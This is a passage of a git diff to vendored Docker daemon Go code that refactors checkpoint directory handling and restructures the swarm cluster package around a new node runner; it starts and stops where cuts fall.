@@ -118,12 +126,12 @@ func TweakCapabilities(basics, adds, drops []string) ([]string, error) { cap = "CAP_" + cap - if !stringutils.InSlice(allCaps, cap) { + if !inSlice(allCaps, cap) { return 
nil, fmt.Errorf("Unknown capability to add: %q", cap) } // add cap if not already in the list - if !stringutils.InSlice(newCaps, cap) { + if !inSlice(newCaps, cap) { newCaps = append(newCaps, strings.ToUpper(cap)) } } diff --git a/vendor/github.com/docker/docker/daemon/changes.go b/vendor/github.com/docker/docker/daemon/changes.go index fc8cd2752c..70b3f6b943 100644 --- a/vendor/github.com/docker/docker/daemon/changes.go +++ b/vendor/github.com/docker/docker/daemon/changes.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "errors" @@ -22,6 +22,9 @@ func (daemon *Daemon) ContainerChanges(name string) ([]archive.Change, error) { container.Lock() defer container.Unlock() + if container.RWLayer == nil { + return nil, errors.New("RWLayer of container " + name + " is unexpectedly nil") + } c, err := container.RWLayer.Changes() if err != nil { return nil, err diff --git a/vendor/github.com/docker/docker/daemon/checkpoint.go b/vendor/github.com/docker/docker/daemon/checkpoint.go index 27181743f5..4a1cb0e10e 100644 --- a/vendor/github.com/docker/docker/daemon/checkpoint.go +++ b/vendor/github.com/docker/docker/daemon/checkpoint.go @@ -1,6 +1,7 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "encoding/json" "fmt" "io/ioutil" @@ -8,14 +9,49 @@ import ( "path/filepath" "github.com/docker/docker/api/types" - "github.com/docker/docker/utils" + "github.com/docker/docker/daemon/names" ) var ( - validCheckpointNameChars = utils.RestrictedNameChars - validCheckpointNamePattern = utils.RestrictedNamePattern + validCheckpointNameChars = names.RestrictedNameChars + validCheckpointNamePattern = names.RestrictedNamePattern ) +// getCheckpointDir verifies checkpoint directory for create,remove, list options and checks if checkpoint already exists +func getCheckpointDir(checkDir, checkpointID, ctrName, ctrID, ctrCheckpointDir string, create bool) (string, error) { + var checkpointDir 
string + var err2 error + if checkDir != "" { + checkpointDir = checkDir + } else { + checkpointDir = ctrCheckpointDir + } + checkpointAbsDir := filepath.Join(checkpointDir, checkpointID) + stat, err := os.Stat(checkpointAbsDir) + if create { + switch { + case err == nil && stat.IsDir(): + err2 = fmt.Errorf("checkpoint with name %s already exists for container %s", checkpointID, ctrName) + case err != nil && os.IsNotExist(err): + err2 = os.MkdirAll(checkpointAbsDir, 0700) + case err != nil: + err2 = err + case err == nil: + err2 = fmt.Errorf("%s exists and is not a directory", checkpointAbsDir) + } + } else { + switch { + case err != nil: + err2 = fmt.Errorf("checkpoint %s does not exists for container %s", checkpointID, ctrName) + case err == nil && stat.IsDir(): + err2 = nil + case err == nil: + err2 = fmt.Errorf("%s exists and is not a directory", checkpointAbsDir) + } + } + return checkpointAbsDir, err2 +} + // CheckpointCreate checkpoints the process running in a container with CRIU func (daemon *Daemon) CheckpointCreate(name string, config types.CheckpointCreateOptions) error { container, err := daemon.GetContainer(name) @@ -27,19 +63,22 @@ func (daemon *Daemon) CheckpointCreate(name string, config types.CheckpointCreat return fmt.Errorf("Container %s not running", name) } - var checkpointDir string - if config.CheckpointDir != "" { - checkpointDir = config.CheckpointDir - } else { - checkpointDir = container.CheckpointDir() + if container.Config.Tty { + return fmt.Errorf("checkpoint not support on containers with tty") } if !validCheckpointNamePattern.MatchString(config.CheckpointID) { return fmt.Errorf("Invalid checkpoint ID (%s), only %s are allowed", config.CheckpointID, validCheckpointNameChars) } - err = daemon.containerd.CreateCheckpoint(container.ID, config.CheckpointID, checkpointDir, config.Exit) + checkpointDir, err := getCheckpointDir(config.CheckpointDir, config.CheckpointID, name, container.ID, container.CheckpointDir(), true) if err != nil { + 
return fmt.Errorf("cannot checkpoint container %s: %s", name, err) + } + + err = daemon.containerd.CreateCheckpoint(context.Background(), container.ID, checkpointDir, config.Exit) + if err != nil { + os.RemoveAll(checkpointDir) return fmt.Errorf("Cannot checkpoint container %s: %s", name, err) } @@ -54,15 +93,11 @@ func (daemon *Daemon) CheckpointDelete(name string, config types.CheckpointDelet if err != nil { return err } - - var checkpointDir string - if config.CheckpointDir != "" { - checkpointDir = config.CheckpointDir - } else { - checkpointDir = container.CheckpointDir() + checkpointDir, err := getCheckpointDir(config.CheckpointDir, config.CheckpointID, name, container.ID, container.CheckpointDir(), false) + if err == nil { + return os.RemoveAll(filepath.Join(checkpointDir, config.CheckpointID)) } - - return os.RemoveAll(filepath.Join(checkpointDir, config.CheckpointID)) + return err } // CheckpointList lists all checkpoints of the specified container @@ -74,11 +109,9 @@ func (daemon *Daemon) CheckpointList(name string, config types.CheckpointListOpt return nil, err } - var checkpointDir string - if config.CheckpointDir != "" { - checkpointDir = config.CheckpointDir - } else { - checkpointDir = container.CheckpointDir() + checkpointDir, err := getCheckpointDir(config.CheckpointDir, "", name, container.ID, container.CheckpointDir(), false) + if err != nil { + return nil, err } if err := os.MkdirAll(checkpointDir, 0755); err != nil { diff --git a/vendor/github.com/docker/docker/daemon/cluster.go b/vendor/github.com/docker/docker/daemon/cluster.go index 98b2aa1e04..b5ac6c4856 100644 --- a/vendor/github.com/docker/docker/daemon/cluster.go +++ b/vendor/github.com/docker/docker/daemon/cluster.go @@ -1,11 +1,25 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( apitypes "github.com/docker/docker/api/types" + lncluster "github.com/docker/libnetwork/cluster" ) // Cluster is the interface for 
github.com/docker/docker/daemon/cluster.(*Cluster). type Cluster interface { + ClusterStatus + NetworkManager + SendClusterEvent(event lncluster.ConfigEventType) +} + +// ClusterStatus interface provides information about the Swarm status of the Cluster +type ClusterStatus interface { + IsAgent() bool + IsManager() bool +} + +// NetworkManager provides methods to manage networks +type NetworkManager interface { GetNetwork(input string) (apitypes.NetworkResource, error) GetNetworks() ([]apitypes.NetworkResource, error) RemoveNetwork(input string) error diff --git a/vendor/github.com/docker/docker/daemon/cluster/cluster.go b/vendor/github.com/docker/docker/daemon/cluster/cluster.go index 4af035b523..35ba5a9378 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/cluster.go +++ b/vendor/github.com/docker/docker/daemon/cluster/cluster.go @@ -1,46 +1,62 @@ -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" + +// +// ## Swarmkit integration +// +// Cluster - static configurable object for accessing everything swarm related. +// Contains methods for connecting and controlling the cluster. Exists always, +// even if swarm mode is not enabled. +// +// NodeRunner - Manager for starting the swarmkit node. Is present only and +// always if swarm mode is enabled. Implements backoff restart loop in case of +// errors. +// +// NodeState - Information about the current node status including access to +// gRPC clients if a manager is active. +// +// ### Locking +// +// `cluster.controlMutex` - taken for the whole lifecycle of the processes that +// can reconfigure cluster(init/join/leave etc). Protects that one +// reconfiguration action has fully completed before another can start. +// +// `cluster.mu` - taken when the actual changes in cluster configurations +// happen. Different from `controlMutex` because in some cases we need to +// access current cluster state even if the long-running reconfiguration is +// going on. 
For example network stack may ask for the current cluster state in +// the middle of the shutdown. Any time current cluster state is asked you +// should take the read lock of `cluster.mu`. If you are writing an API +// responder that returns synchronously, hold `cluster.mu.RLock()` for the +// duration of the whole handler function. That ensures that node will not be +// shut down until the handler has finished. +// +// NodeRunner implements its internal locks that should not be used outside of +// the struct. Instead, you should just call `nodeRunner.State()` method to get +// the current state of the cluster(still need `cluster.mu.RLock()` to access +// `cluster.nr` reference itself). Most of the changes in NodeRunner happen +// because of an external event(network problem, unexpected swarmkit error) and +// Docker shouldn't take any locks that delay these changes from happening. +// import ( - "crypto/x509" - "encoding/base64" - "encoding/json" + "context" "fmt" - "io" - "io/ioutil" "net" "os" "path/filepath" - "runtime" - "strings" "sync" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" - distreference "github.com/docker/distribution/reference" - apierrors "github.com/docker/docker/api/errors" - apitypes "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/backend" - "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/network" types "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/docker/daemon/cluster/controllers/plugin" executorpkg "github.com/docker/docker/daemon/cluster/executor" - "github.com/docker/docker/daemon/cluster/executor/container" - "github.com/docker/docker/daemon/logger" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/signal" - "github.com/docker/docker/pkg/stdcopy" - "github.com/docker/docker/reference" - 
"github.com/docker/docker/runconfig" + lncluster "github.com/docker/libnetwork/cluster" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/manager/encryption" swarmnode "github.com/docker/swarmkit/node" - "github.com/docker/swarmkit/protobuf/ptypes" "github.com/pkg/errors" - "golang.org/x/net/context" - "google.golang.org/grpc" + "github.com/sirupsen/logrus" ) const swarmDirName = "swarm" @@ -56,29 +72,10 @@ const ( contextPrefix = "com.docker.swarm" ) -// ErrNoSwarm is returned on leaving a cluster that was never initialized -var ErrNoSwarm = fmt.Errorf("This node is not part of a swarm") - -// ErrSwarmExists is returned on initialize or join request for a cluster that has already been activated -var ErrSwarmExists = fmt.Errorf("This node is already part of a swarm. Use \"docker swarm leave\" to leave this swarm and join another one.") - -// ErrPendingSwarmExists is returned on initialize or join request for a cluster that is already processing a similar request but has not succeeded yet. -var ErrPendingSwarmExists = fmt.Errorf("This node is processing an existing join request that has not succeeded yet. Use \"docker swarm leave\" to cancel the current request.") - -// ErrSwarmJoinTimeoutReached is returned when cluster join could not complete before timeout was reached. -var ErrSwarmJoinTimeoutReached = fmt.Errorf("Timeout was reached before node was joined. The attempt to join the swarm will continue in the background. Use the \"docker info\" command to see the current swarm status of your node.") - -// ErrSwarmLocked is returned if the swarm is encrypted and needs a key to unlock it. -var ErrSwarmLocked = fmt.Errorf("Swarm is encrypted and needs to be unlocked before it can be used. Please use \"docker swarm unlock\" to unlock it.") - -// ErrSwarmCertificatesExpired is returned if docker was not started for the whole validity period and they had no chance to renew automatically. 
-var ErrSwarmCertificatesExpired = errors.New("Swarm certificates have expired. To replace them, leave the swarm and join again.") - // NetworkSubnetsProvider exposes functions for retrieving the subnets // of networks managed by Docker, so they can be filtered. type NetworkSubnetsProvider interface { - V4Subnets() []net.IPNet - V6Subnets() []net.IPNet + Subnets() ([]net.IPNet, []net.IPNet) } // Config provides values for Cluster. @@ -86,6 +83,9 @@ type Config struct { Root string Name string Backend executorpkg.Backend + ImageBackend executorpkg.ImageBackend + PluginBackend plugin.Backend + VolumeBackend executorpkg.VolumeBackend NetworkSubnetsProvider NetworkSubnetsProvider // DefaultAdvertiseAddr is the default host/IP or network interface to use @@ -94,24 +94,30 @@ type Config struct { // path to store runtime state, such as the swarm control socket RuntimeRoot string + + // WatchStream is a channel to pass watch API notifications to daemon + WatchStream chan *swarmapi.WatchMessage + + // RaftHeartbeatTick is the number of ticks for heartbeat of quorum members + RaftHeartbeatTick uint32 + + // RaftElectionTick is the number of ticks to elapse before followers propose a new round of leader election + // This value should be 10x that of RaftHeartbeatTick + RaftElectionTick uint32 } // Cluster provides capabilities to participate in a cluster as a worker or a // manager. 
type Cluster struct { - sync.RWMutex - *node - root string - runtimeRoot string - config Config - configEvent chan struct{} // todo: make this array and goroutine safe - actualLocalAddr string // after resolution, not persisted - stop bool - err error - cancelDelay func() - attachers map[string]*attacher - locked bool - lastNodeConfig *nodeStartConfig + mu sync.RWMutex + controlMutex sync.RWMutex // protect init/join/leave user operations + nr *nodeRunner + root string + runtimeRoot string + config Config + configEvent chan lncluster.ConfigEventType // todo: make this array and goroutine safe + attachers map[string]*attacher + watchStream chan *swarmapi.WatchMessage } // attacher manages the in-memory attachment state of a container @@ -121,43 +127,12 @@ type Cluster struct { type attacher struct { taskID string config *network.NetworkingConfig + inProgress bool attachWaitCh chan *network.NetworkingConfig attachCompleteCh chan struct{} detachWaitCh chan struct{} } -type node struct { - *swarmnode.Node - done chan struct{} - ready bool - conn *grpc.ClientConn - client swarmapi.ControlClient - logs swarmapi.LogsClient - reconnectDelay time.Duration - config nodeStartConfig -} - -// nodeStartConfig holds configuration needed to start a new node. Exported -// fields of this structure are saved to disk in json. Unexported fields -// contain data that shouldn't be persisted between daemon reloads. -type nodeStartConfig struct { - // LocalAddr is this machine's local IP or hostname, if specified. - LocalAddr string - // RemoteAddr is the address that was given to "swarm join". It is used - // to find LocalAddr if necessary. - RemoteAddr string - // ListenAddr is the address we bind to, including a port. - ListenAddr string - // AdvertiseAddr is the address other nodes should connect to, - // including a port. 
- AdvertiseAddr string - joinAddr string - forceNewCluster bool - joinToken string - lockKey []byte - autolock bool -} - // New creates a new Cluster instance using provided config. func New(config Config) (*Cluster, error) { root := filepath.Join(config.Root, swarmDirName) @@ -167,114 +142,61 @@ func New(config Config) (*Cluster, error) { if config.RuntimeRoot == "" { config.RuntimeRoot = root } + if config.RaftHeartbeatTick == 0 { + config.RaftHeartbeatTick = 1 + } + if config.RaftElectionTick == 0 { + // 10X heartbeat tick is the recommended ratio according to etcd docs. + config.RaftElectionTick = 10 * config.RaftHeartbeatTick + } + if err := os.MkdirAll(config.RuntimeRoot, 0700); err != nil { return nil, err } c := &Cluster{ root: root, config: config, - configEvent: make(chan struct{}, 10), + configEvent: make(chan lncluster.ConfigEventType, 10), runtimeRoot: config.RuntimeRoot, attachers: make(map[string]*attacher), + watchStream: config.WatchStream, } - - nodeConfig, err := c.loadState() - if err != nil { - if os.IsNotExist(err) { - return c, nil - } - return nil, err - } - - n, err := c.startNewNode(*nodeConfig) - if err != nil { - return nil, err - } - - select { - case <-time.After(swarmConnectTimeout): - logrus.Error("swarm component could not be started before timeout was reached") - case <-n.Ready(): - case <-n.done: - if errors.Cause(c.err) == ErrSwarmLocked { - return c, nil - } - if err, ok := errors.Cause(c.err).(x509.CertificateInvalidError); ok && err.Reason == x509.Expired { - c.err = ErrSwarmCertificatesExpired - return c, nil - } - return nil, fmt.Errorf("swarm component could not be started: %v", c.err) - } - go c.reconnectOnFailure(n) return c, nil } -func (c *Cluster) loadState() (*nodeStartConfig, error) { - dt, err := ioutil.ReadFile(filepath.Join(c.root, stateFile)) +// Start the Cluster instance +// TODO The split between New and Start can be join again when the SendClusterEvent +// method is no longer required +func (c *Cluster) 
Start() error { + root := filepath.Join(c.config.Root, swarmDirName) + + nodeConfig, err := loadPersistentState(root) if err != nil { - return nil, err - } - // missing certificate means no actual state to restore from - if _, err := os.Stat(filepath.Join(c.root, "certificates/swarm-node.crt")); err != nil { if os.IsNotExist(err) { - c.clearState() + return nil } - return nil, err - } - var st nodeStartConfig - if err := json.Unmarshal(dt, &st); err != nil { - return nil, err + return err } - return &st, nil -} -func (c *Cluster) saveState(config nodeStartConfig) error { - dt, err := json.Marshal(config) + nr, err := c.newNodeRunner(*nodeConfig) if err != nil { return err } - return ioutils.AtomicWriteFile(filepath.Join(c.root, stateFile), dt, 0600) -} + c.nr = nr -func (c *Cluster) reconnectOnFailure(n *node) { - for { - <-n.done - c.Lock() - if c.stop || c.node != nil { - c.Unlock() - return - } - n.reconnectDelay *= 2 - if n.reconnectDelay > maxReconnectDelay { - n.reconnectDelay = maxReconnectDelay - } - logrus.Warnf("Restarting swarm in %.2f seconds", n.reconnectDelay.Seconds()) - delayCtx, cancel := context.WithTimeout(context.Background(), n.reconnectDelay) - c.cancelDelay = cancel - c.Unlock() - <-delayCtx.Done() - if delayCtx.Err() != context.DeadlineExceeded { - return - } - c.Lock() - if c.node != nil { - c.Unlock() - return - } - var err error - config := n.config - config.RemoteAddr = c.getRemoteAddress() - config.joinAddr = config.RemoteAddr - n, err = c.startNewNode(config) + select { + case <-time.After(swarmConnectTimeout): + logrus.Error("swarm component could not be started before timeout was reached") + case err := <-nr.Ready(): if err != nil { - c.err = err - close(n.done) + logrus.WithError(err).Error("swarm component could not be started") + return nil } - c.Unlock() } + return nil } -func (c *Cluster) startNewNode(conf nodeStartConfig) (*node, error) { +func (c *Cluster) newNodeRunner(conf nodeStartConfig) (*nodeRunner, error) { if err := 
c.config.Backend.IsSwarmCompatible(); err != nil { return nil, err } @@ -308,1551 +230,174 @@ func (c *Cluster) startNewNode(conf nodeStartConfig) (*node, error) { } } - var control string - if runtime.GOOS == "windows" { - control = `\\.\pipe\` + controlSocket - } else { - control = filepath.Join(c.runtimeRoot, controlSocket) - } - - c.node = nil - c.cancelDelay = nil - c.stop = false - n, err := swarmnode.New(&swarmnode.Config{ - Hostname: c.config.Name, - ForceNewCluster: conf.forceNewCluster, - ListenControlAPI: control, - ListenRemoteAPI: conf.ListenAddr, - AdvertiseRemoteAPI: conf.AdvertiseAddr, - JoinAddr: conf.joinAddr, - StateDir: c.root, - JoinToken: conf.joinToken, - Executor: container.NewExecutor(c.config.Backend), - HeartbeatTick: 1, - ElectionTick: 3, - UnlockKey: conf.lockKey, - AutoLockManagers: conf.autolock, - PluginGetter: c.config.Backend.PluginGetter(), - }) + nr := &nodeRunner{cluster: c} + nr.actualLocalAddr = actualLocalAddr - if err != nil { - return nil, err - } - ctx := context.Background() - if err := n.Start(ctx); err != nil { + if err := nr.Start(conf); err != nil { return nil, err } - node := &node{ - Node: n, - done: make(chan struct{}), - reconnectDelay: initialReconnectDelay, - config: conf, - } - c.node = node - c.actualLocalAddr = actualLocalAddr // not saved - c.saveState(conf) c.config.Backend.DaemonJoinsCluster(c) - go func() { - err := detectLockedError(n.Err(ctx)) - if err != nil { - logrus.Errorf("cluster exited with error: %v", err) - } - c.Lock() - c.node = nil - c.err = err - if errors.Cause(err) == ErrSwarmLocked { - c.locked = true - confClone := conf - c.lastNodeConfig = &confClone - } - c.Unlock() - close(node.done) - }() - - go func() { - select { - case <-n.Ready(): - c.Lock() - node.ready = true - c.err = nil - c.Unlock() - case <-ctx.Done(): - } - c.configEvent <- struct{}{} - }() - - go func() { - for conn := range n.ListenControlSocket(ctx) { - c.Lock() - if node.conn != conn { - if conn == nil { - node.client 
= nil - node.logs = nil - } else { - node.client = swarmapi.NewControlClient(conn) - node.logs = swarmapi.NewLogsClient(conn) - } - } - node.conn = conn - c.Unlock() - c.configEvent <- struct{}{} - } - }() - - return node, nil -} - -// Init initializes new cluster from user provided request. -func (c *Cluster) Init(req types.InitRequest) (string, error) { - c.Lock() - if c.swarmExists() { - if !req.ForceNewCluster { - c.Unlock() - return "", ErrSwarmExists - } - if err := c.stopNode(); err != nil { - c.Unlock() - return "", err - } - } - - if err := validateAndSanitizeInitRequest(&req); err != nil { - c.Unlock() - return "", err - } - - listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) - if err != nil { - c.Unlock() - return "", err - } - - advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) - if err != nil { - c.Unlock() - return "", err - } - - localAddr := listenHost - - // If the local address is undetermined, the advertise address - // will be used as local address, if it belongs to this system. - // If the advertise address is not local, then we try to find - // a system address to use as local address. If this fails, - // we give up and ask user to pass the listen address. 
- if net.ParseIP(localAddr).IsUnspecified() { - advertiseIP := net.ParseIP(advertiseHost) - - found := false - for _, systemIP := range listSystemIPs() { - if systemIP.Equal(advertiseIP) { - localAddr = advertiseIP.String() - found = true - break - } - } - - if !found { - ip, err := c.resolveSystemAddr() - if err != nil { - c.Unlock() - logrus.Warnf("Could not find a local address: %v", err) - return "", errMustSpecifyListenAddr - } - localAddr = ip.String() - } - } - - // todo: check current state existing - n, err := c.startNewNode(nodeStartConfig{ - forceNewCluster: req.ForceNewCluster, - autolock: req.AutoLockManagers, - LocalAddr: localAddr, - ListenAddr: net.JoinHostPort(listenHost, listenPort), - AdvertiseAddr: net.JoinHostPort(advertiseHost, advertisePort), - }) - if err != nil { - c.Unlock() - return "", err - } - c.Unlock() - - select { - case <-n.Ready(): - if err := initClusterSpec(n, req.Spec); err != nil { - return "", err - } - go c.reconnectOnFailure(n) - return n.NodeID(), nil - case <-n.done: - c.RLock() - defer c.RUnlock() - if !req.ForceNewCluster { // if failure on first attempt don't keep state - if err := c.clearState(); err != nil { - return "", err - } - } - return "", c.err - } -} - -// Join makes current Cluster part of an existing swarm cluster. -func (c *Cluster) Join(req types.JoinRequest) error { - c.Lock() - if c.swarmExists() { - c.Unlock() - return ErrSwarmExists - } - if err := validateAndSanitizeJoinRequest(&req); err != nil { - c.Unlock() - return err - } - - listenHost, listenPort, err := resolveListenAddr(req.ListenAddr) - if err != nil { - c.Unlock() - return err - } - - var advertiseAddr string - if req.AdvertiseAddr != "" { - advertiseHost, advertisePort, err := c.resolveAdvertiseAddr(req.AdvertiseAddr, listenPort) - // For joining, we don't need to provide an advertise address, - // since the remote side can detect it. 
- if err == nil { - advertiseAddr = net.JoinHostPort(advertiseHost, advertisePort) - } - } - - // todo: check current state existing - n, err := c.startNewNode(nodeStartConfig{ - RemoteAddr: req.RemoteAddrs[0], - ListenAddr: net.JoinHostPort(listenHost, listenPort), - AdvertiseAddr: advertiseAddr, - joinAddr: req.RemoteAddrs[0], - joinToken: req.JoinToken, - }) - if err != nil { - c.Unlock() - return err - } - c.Unlock() - - select { - case <-time.After(swarmConnectTimeout): - // attempt to connect will continue in background, but reconnect only if it didn't fail - go func() { - select { - case <-n.Ready(): - c.reconnectOnFailure(n) - case <-n.done: - logrus.Errorf("failed to join the cluster: %+v", c.err) - } - }() - return ErrSwarmJoinTimeoutReached - case <-n.Ready(): - go c.reconnectOnFailure(n) - return nil - case <-n.done: - c.RLock() - defer c.RUnlock() - return c.err - } -} - -// GetUnlockKey returns the unlock key for the swarm. -func (c *Cluster) GetUnlockKey() (string, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return "", c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - client := swarmapi.NewCAClient(c.conn) - - r, err := client.GetUnlockKey(ctx, &swarmapi.GetUnlockKeyRequest{}) - if err != nil { - return "", err - } - - if len(r.UnlockKey) == 0 { - // no key - return "", nil - } - - return encryption.HumanReadableKey(r.UnlockKey), nil -} - -// UnlockSwarm provides a key to decrypt data that is encrypted at rest. 
-func (c *Cluster) UnlockSwarm(req types.UnlockRequest) error { - c.RLock() - if !c.isActiveManager() { - if err := c.errNoManager(); err != ErrSwarmLocked { - c.RUnlock() - return err - } - } - - if c.node != nil || c.locked != true { - c.RUnlock() - return errors.New("swarm is not locked") - } - c.RUnlock() - - key, err := encryption.ParseHumanReadableKey(req.UnlockKey) - if err != nil { - return err - } - - c.Lock() - config := *c.lastNodeConfig - config.lockKey = key - n, err := c.startNewNode(config) - if err != nil { - c.Unlock() - return err - } - c.Unlock() - select { - case <-n.Ready(): - case <-n.done: - if errors.Cause(c.err) == ErrSwarmLocked { - return errors.New("swarm could not be unlocked: invalid key provided") - } - return fmt.Errorf("swarm component could not be started: %v", c.err) - } - go c.reconnectOnFailure(n) - return nil -} - -// stopNode is a helper that stops the active c.node and waits until it has -// shut down. Call while keeping the cluster lock. -func (c *Cluster) stopNode() error { - if c.node == nil { - return nil - } - c.stop = true - if c.cancelDelay != nil { - c.cancelDelay() - c.cancelDelay = nil - } - node := c.node - ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) - defer cancel() - // TODO: can't hold lock on stop because it calls back to network - c.Unlock() - defer c.Lock() - if err := node.Stop(ctx); err != nil && !strings.Contains(err.Error(), "context canceled") { - return err - } - <-node.done - return nil -} - -func removingManagerCausesLossOfQuorum(reachable, unreachable int) bool { - return reachable-2 <= unreachable -} - -func isLastManager(reachable, unreachable int) bool { - return reachable == 1 && unreachable == 0 -} - -// Leave shuts down Cluster and removes current state. 
-func (c *Cluster) Leave(force bool) error { - c.Lock() - node := c.node - if node == nil { - if c.locked { - c.locked = false - c.lastNodeConfig = nil - c.Unlock() - } else if c.err == ErrSwarmCertificatesExpired { - c.err = nil - c.Unlock() - } else { - c.Unlock() - return ErrNoSwarm - } - } else { - if node.Manager() != nil && !force { - msg := "You are attempting to leave the swarm on a node that is participating as a manager. " - if c.isActiveManager() { - active, reachable, unreachable, err := c.managerStats() - if err == nil { - if active && removingManagerCausesLossOfQuorum(reachable, unreachable) { - if isLastManager(reachable, unreachable) { - msg += "Removing the last manager erases all current state of the swarm. Use `--force` to ignore this message. " - c.Unlock() - return fmt.Errorf(msg) - } - msg += fmt.Sprintf("Removing this node leaves %v managers out of %v. Without a Raft quorum your swarm will be inaccessible. ", reachable-1, reachable+unreachable) - } - } - } else { - msg += "Doing so may lose the consensus of your cluster. " - } - - msg += "The only way to restore a swarm that has lost consensus is to reinitialize it with `--force-new-cluster`. Use `--force` to suppress this message." - c.Unlock() - return fmt.Errorf(msg) - } - if err := c.stopNode(); err != nil { - logrus.Errorf("failed to shut down cluster node: %v", err) - signal.DumpStacks("") - c.Unlock() - return err - } - c.Unlock() - if nodeID := node.NodeID(); nodeID != "" { - nodeContainers, err := c.listContainerForNode(nodeID) - if err != nil { - return err - } - for _, id := range nodeContainers { - if err := c.config.Backend.ContainerRm(id, &apitypes.ContainerRmConfig{ForceRemove: true}); err != nil { - logrus.Errorf("error removing %v: %v", id, err) - } - } - } - } - c.configEvent <- struct{}{} - // todo: cleanup optional? 
- if err := c.clearState(); err != nil { - return err - } - - return nil -} - -func (c *Cluster) listContainerForNode(nodeID string) ([]string, error) { - var ids []string - filters := filters.NewArgs() - filters.Add("label", fmt.Sprintf("com.docker.swarm.node.id=%s", nodeID)) - containers, err := c.config.Backend.Containers(&apitypes.ContainerListOptions{ - Filters: filters, - }) - if err != nil { - return []string{}, err - } - for _, c := range containers { - ids = append(ids, c.ID) - } - return ids, nil -} -func (c *Cluster) clearState() error { - // todo: backup this data instead of removing? - if err := os.RemoveAll(c.root); err != nil { - return err - } - if err := os.MkdirAll(c.root, 0700); err != nil { - return err - } - c.config.Backend.DaemonLeavesCluster() - return nil + return nr, nil } func (c *Cluster) getRequestContext() (context.Context, func()) { // TODO: not needed when requests don't block on qourum lost return context.WithTimeout(context.Background(), swarmRequestTimeout) } -// Inspect retrieves the configuration properties of a managed swarm cluster. -func (c *Cluster) Inspect() (types.Swarm, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return types.Swarm{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - swarm, err := getSwarm(ctx, c.client) - if err != nil { - return types.Swarm{}, err - } - - return convert.SwarmFromGRPC(*swarm), nil -} - -// Update updates configuration of a managed swarm cluster. -func (c *Cluster) Update(version uint64, spec types.Spec, flags types.UpdateFlags) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - swarm, err := getSwarm(ctx, c.client) - if err != nil { - return err - } - - // In update, client should provide the complete spec of the swarm, including - // Name and Labels. 
If a field is specified with 0 or nil, then the default value - // will be used to swarmkit. - clusterSpec, err := convert.SwarmSpecToGRPC(spec) - if err != nil { - return err - } - - _, err = c.client.UpdateCluster( - ctx, - &swarmapi.UpdateClusterRequest{ - ClusterID: swarm.ID, - Spec: &clusterSpec, - ClusterVersion: &swarmapi.Version{ - Index: version, - }, - Rotation: swarmapi.KeyRotation{ - WorkerJoinToken: flags.RotateWorkerToken, - ManagerJoinToken: flags.RotateManagerToken, - ManagerUnlockKey: flags.RotateManagerUnlockKey, - }, - }, - ) - return err -} - // IsManager returns true if Cluster is participating as a manager. func (c *Cluster) IsManager() bool { - c.RLock() - defer c.RUnlock() - return c.isActiveManager() + c.mu.RLock() + defer c.mu.RUnlock() + return c.currentNodeState().IsActiveManager() } // IsAgent returns true if Cluster is participating as a worker/agent. func (c *Cluster) IsAgent() bool { - c.RLock() - defer c.RUnlock() - return c.node != nil && c.ready + c.mu.RLock() + defer c.mu.RUnlock() + return c.currentNodeState().status == types.LocalNodeStateActive } // GetLocalAddress returns the local address. func (c *Cluster) GetLocalAddress() string { - c.RLock() - defer c.RUnlock() - return c.actualLocalAddr + c.mu.RLock() + defer c.mu.RUnlock() + return c.currentNodeState().actualLocalAddr } // GetListenAddress returns the listen address. func (c *Cluster) GetListenAddress() string { - c.RLock() - defer c.RUnlock() - if c.node != nil { - return c.node.config.ListenAddr + c.mu.RLock() + defer c.mu.RUnlock() + if c.nr != nil { + return c.nr.config.ListenAddr } return "" } // GetAdvertiseAddress returns the remotely reachable address of this node. 
func (c *Cluster) GetAdvertiseAddress() string { - c.RLock() - defer c.RUnlock() - if c.node != nil && c.node.config.AdvertiseAddr != "" { - advertiseHost, _, _ := net.SplitHostPort(c.node.config.AdvertiseAddr) + c.mu.RLock() + defer c.mu.RUnlock() + if c.nr != nil && c.nr.config.AdvertiseAddr != "" { + advertiseHost, _, _ := net.SplitHostPort(c.nr.config.AdvertiseAddr) return advertiseHost } - return c.actualLocalAddr + return c.currentNodeState().actualLocalAddr +} + +// GetDataPathAddress returns the address to be used for the data path traffic, if specified. +func (c *Cluster) GetDataPathAddress() string { + c.mu.RLock() + defer c.mu.RUnlock() + if c.nr != nil { + return c.nr.config.DataPathAddr + } + return "" } -// GetRemoteAddress returns a known advertise address of a remote manager if +// GetRemoteAddressList returns the advertise address for each of the remote managers if // available. -// todo: change to array/connect with info -func (c *Cluster) GetRemoteAddress() string { - c.RLock() - defer c.RUnlock() - return c.getRemoteAddress() +func (c *Cluster) GetRemoteAddressList() []string { + c.mu.RLock() + defer c.mu.RUnlock() + return c.getRemoteAddressList() +} + +// GetWatchStream returns the channel to pass changes from store watch API +func (c *Cluster) GetWatchStream() chan *swarmapi.WatchMessage { + c.mu.RLock() + defer c.mu.RUnlock() + return c.watchStream } -func (c *Cluster) getRemoteAddress() string { - if c.node == nil { - return "" +func (c *Cluster) getRemoteAddressList() []string { + state := c.currentNodeState() + if state.swarmNode == nil { + return []string{} } - nodeID := c.node.NodeID() - for _, r := range c.node.Remotes() { + + nodeID := 